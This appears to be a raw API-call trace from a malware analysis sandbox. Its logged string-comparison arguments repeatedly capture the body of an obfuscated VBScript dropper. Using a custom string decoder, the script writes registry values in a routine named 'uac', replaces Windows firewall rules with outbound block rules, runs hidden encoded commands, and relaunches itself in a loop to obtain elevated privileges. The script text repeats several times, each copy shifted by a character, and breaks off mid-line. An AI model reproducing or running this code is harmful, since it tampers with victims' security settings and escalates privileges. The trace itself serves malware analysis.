CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 81 [0226.295] wcsncmp (_String1="\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.295] wcsncmp (_String1="x4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0226.295] wcsncmp (_String1="4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 39 [0226.296] wcsncmp (_String1=" = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 